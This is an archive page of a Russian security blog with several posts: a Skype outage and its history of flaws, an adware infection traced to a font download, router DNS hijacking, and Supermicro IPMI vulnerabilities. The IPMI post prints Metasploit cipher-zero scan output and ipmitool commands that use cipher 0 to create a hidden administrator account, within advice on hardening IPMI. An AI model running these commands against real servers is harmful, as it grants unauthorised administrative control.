Архив рубрики: Sercurity

Дмитрий Евтеев в эфире LifeNews: "У Skype есть альтернативы"

Технический директор компании Headlight Security Дмитрий Евтеев в эфире LifeNews прокомментировал сегодняшний глобальный сбой в работе Skype, предположив, что виноваты не хакеры, а человеческий фактор, и порекомендовал переходить на другие системы виртуального общения, в частности, на отечественный Telegram.

«В последнее время набирает обороты такой сервис, как Telegram. К сожалению, сейчас он позволяет обмениваться только текстовой информацией, но такие события, как сегодняшние, говорят о том, что наши разработчики вполне могут занять эту часть рынка», — отметил Дмитрий Евтеев.
Напомним, что сегодня утром у многих пользователей Skype во всем мире наблюдались проблемы с отображением статуса списка контактов, в результате чего они не могли осуществлять звонки. В некоторых случаях не работали и текстовые сообщения. Проблемы были зафиксированы, как в полнофункциональной, так и в мобильной версиях Skype, тогда как веб-версия продолжала работать. Официальный Твиттер Skype Support признал наличие проблемы.
В последние годы у Skype возникают проблемы самого разного характера. В июне 2013 года было обнаружено, что злоумышленники активно используют брешь в Skype, позволяющую после 9 жалоб навсегда заблокировать учетную запись пользователя. В декабре 2014 года появилась информация об уязвимости в Android-версии приложения, которая позволяет следить за жертвой через камеру и микрофон ее мобильного устройства. Совсем недавно, в июне 2015 года, выяснилось, что некоторые версии приложения аварийно завершают свою работу при получении в сообщении строки «http://:».
Наиболее запоминающаяся история произошла в ноябре 2012 года: пользователь Хабра продемонстрировал простую технику угона любого аккаунта Skype, опубликовав данный способ после безуспешных обращений в службу технической поддержки Skype в течение трех месяцев. В тоже самое время другой исследователь выявил, каким способом можно деанонимизировать IP-адрес собеседника. Надо сказать, что с 2012 года мало что изменилось — на неэффективную работу Skype Support в случае потери доступа к аккаунту пользователи обращали внимание и в 2015 году.

Полное интервью Дмитрия доступно по следующей ссылке (с 16-й минуты): https://peers.tv/show/lifenews/life_news/55198839/?autoplay=1

Другие ссылки по теме:
http://www.aif.ru/dontknows/actual/pochemu_ne_rabotaet_skype

Автор:
Дата публикации:

Удаление High Stairs — рекламная программа

Сегодня друг обнаружил, что его страничка ВКонтакте и стартовая страница Рамблера завалены посторонними рекламными блоками (типа, aliexpress).
Сначала подозрение пало на постороннее расширение в браузере Chrome: Переводчик. Оно был удалено через Дополнительные инструменты → Расширения, так как пользователем не устанавливалось.
Но проблема с рекламой не решилась.
Тогда решили посмотреть список недавно установленных программ (сделать это можно по адресу Пуск → Панель управления → Удаление программ или в программе-чистилке типа CCleaner). Так и есть, «злодей» найден: программа  High Stairs.

Она была немедленно удалена, назойливые рекламные блоки исчезли.
Вот видео по удалению High Stairshttp://www.youtube.com/watch?v=BqhCMmY-lS4
Вот этот сайт http://www.securitystronghold.com/ru/gates/remove-high-stairs.html предлагает целый комплекс мер по удалению программы High Stairs. (Не проверял).

Как же попала программа High Stairs на компьютер? Список загрузок браузера привел на сайт http://fontsgeek.com/ Конкретно, на скачивание шрифта http://fontsgeek.com/fonts/Trajan-Pro-Bold
Товарищ выбрал кнопку Installer Download и загрузил архив. Результат: антивирус AVG при сканировании файла выдал предупреждение

Trojan horse Generic



Будьте внимательны. Надеюсь, статья был вам полезна.

Автор: Роман Сталкер
Дата публикации: 2015-08-25T06:06:00.000-07:00

Не отображаются встроенные Яндекс карты

Начиная с версии Firefox 35, у пользователей появилась возможность силами браузера «просить» сайты не следить за ними (описание). Это имеет довольно неожиданный эффект для встроенных в сайт Яндекс карт — они просто не отображаются, оставляя пустое поле на странице и недоумение у посетителя.
При обращении к странице со встроенной картой в firebug можно наблюдать предупреждение: «Ресурс на «https://api-maps.yandex.ru/2.1/?lang=ru_RU» был заблокирован, так как включена защита от отслеживания.»

Чтобы не ломать вёрстку и не вводить в заблуждение посетителей сайта, надо предусмотреть проверку (включена ли такая функция защиты в Firefox) и выдавать предупреждение с понятной инструкцией, как можно карту всё-таки увидеть (нажать в адресной строке Firefox на иконку щита -> Настройки -> Отключить защиту для этого сайта).

Автор: Олег Ехлаков

О дырявых роутерах…

Звонит мне, значится, сегодня друг и говорит.

Что-то с Контактом какая-то фигня. Работает-работает, бах, сваливается на страницу авторизации. А на этой странице кроме кнопки войти всё остальное не работает и выдаёт ошибку. Вчера весь день комп на предмет вирусной дряни шмонал — ничего. А сегодня заметил, что и телефон при работе через wi-fi вытворяет то же самое. Сейчас подключил напрямую Интернет без роутера — вроде бы всё нормально. Может быть проблема в роутере?

Ну тут мне вспомнился давешний пост на OpenNet. Роутер Asus RT-N10R. Попросил сделать вывод nslookup:

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:UsersUser>nslookup vk.com
Server: UnKnown
Address: 178.208.81.126

Name: vk.com
Address: 178.208.81.126

А должно быть как-то так:

C:UsersUser>nslookup vk.com
Server: router.asus.com
Address: 192.168.1.1 

Non-authoritative answer:
Name: vk.com
Addresses: 2a00:bdc0:3:103:1:0:403:901
2a00:bdc0:3:103:1:0:403:902
2a00:bdc0:3:103:1:0:403:903
87.240.131.99
87.240.131.97
87.240.131.120

Т.е. роутер отдавал клиентам сети в качестве dns-сервера 178.208.81.126 — адрес злоумышленника. При обращении к этому адресу 178.208.81.126 вылезла страничка «типа, одноклассников». В коде страницы честно присутствует:

 

 

Если запросить vk.com — вылезет страничка входа Контактика. Сброс роутера проблему временно решил. Обновили до последней прошивки. При возможности дополню.
PS. Будьте внимательны, используйте двухфакторную аутентификацию.
PS2. Аналогичный случай

Автор: Василий Иванов
Дата публикации: 2015-05-23T02:47:00.001-07:00

IPMI и безопасность

В IPMI Supermicro обнаружена серьезная проблема с безопасностью. Оказалось, что в файле PSBlock хранятся пароли в открытом виде (причина — в спецификации IPMI 2.0), а сам файл можно легко получить простым GET запросом через порт 49152. Уязвимость присутствует во всех платах Supermicro, использующих BMC Nuvoton WPCM450. Что делать?
Временное решение — отключить UPnP, убив соответствующие сервисы. Но при перезагрузке BMC UPnP будет снова запущен.
Если вы по какой-то странной причине просто взяли и выставили IPMI в интернет, то самое время перестать это делать. Как и любой интерфейс управления IPMI должен находится в отдельной сети, наружных доступ — только через VPN. Относитесь к IPMI любого вендора, как к заведомо небезопасному интерфейсу, который позволит злоумышленнику получить доступ к консоли сервера.
Помимо вчерашней уязвимости с PSBlock, есть еще обширный список давно известных уязвимостей, закрытых в последних прошивках. Описание есть на Rapid7:

Cipher 0. Самая скандальная уязвимость, связанная с изначальной ошибкой в спецификации IPMI 2.0. На запрос клиента об использовании нешифрованной передачи данных IPMI позволяет получить доступ без пароля. Вот пример того, что получилось в сети клиента (несколько серверов с платами X8 и X9) после сканирования из Metasploit shell:

msf exploit(libupnp_ssdp_overflow) > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf auxiliary(ipmi_cipher_zero) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(ipmi_cipher_zero) > run

[*] Sending IPMI requests to 192.168.1.0->192.168.1.255 (256 hosts)
[+] 192.168.1.32:623 — IPMI — VULNERABLE: Accepted a session open request for cipher zero
[+] 192.168.1.71:623 — IPMI — VULNERABLE: Accepted a session open request for cipher zero
[+] 192.168.1.219:623 — IPMI — VULNERABLE: Accepted a session open request for cipher zero
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Получаем список пользователей:

ipmitool -I lanplus -C 0 -H 192.168.1.32 -U ADMIN -P FluffyWabbit user list
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
2   ADMIN            false   false      true       ADMINISTRATOR

Добавляем пользователя с ID=3 и администраторскими правами:

ipmitool -I lanplus -C 0 -H 192.168.1.32 -U ADMIN -P FluffyWabbit user set name 3 quartz
ipmitool -I lanplus -C 0 -H 192.168.1.32 -U ADMIN -P FluffyWabbit user set password 3 Q123q
ipmitool -I lanplus -C 0 -H 192.168.1.32 -U ADMIN -P FluffyWabbit user priv 3 4
ipmitool -I lanplus -C 0 -H 192.168.1.32 -U ADMIN -P FluffyWabbit user enable 3

Получаем доступ:

IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval. Снова проблема в спецификации IPMI 2.0, которая приводит к курьезу: система без всякой авторизации просто отдает хэш пароля. Можно забрать хэши и заняться брутфорсом при помощи какого-нибудь JohnTheRipper.
Есть еще куча дыр: UPnP, анонимный доступ (пользователь с пустым именем), локальный доступ из ОС хоста без авторизации… Уязвимости закрываются в новых прошивках IPMI, но выявляются новые.
Внимательно прочтите «IPMI Security Best Practices» и ограничьте доступ к IPMI.

Автор: Dmitry Nosachev

Чтение исходников

Почему возникает потребность читать исходники сторонних, стандартных библиотек?
1. В исходниках можно найти примеры инженерных решений
Можно подчеркнуть архитектурные решения, принципы взаимодействия компоненнтов и прочее и прочее.

2. Примеры кода
Если код писал профессионал, то можно утащить себе в копилку красивые решения. Обратная ситуация — говнокод — в копилочку как делать не надо

3. Исходники могут быть единственным источником документации
«…код должен быть самодокументированным…», «…комментарии — трата времени…». Если разработчик библиотеки был из этих, то в перед к чтению исходного кода.

4. Для поиска багов
Баги есть везде, даже в стандартных библиотеках. И возникают ситуации когда — программа ведет себя не так как описано в документации и ошибка явно не в собственном коде, придется опускаться на уровень ниже  и читать исходники библиотек.

Автор: Евгений Курочкин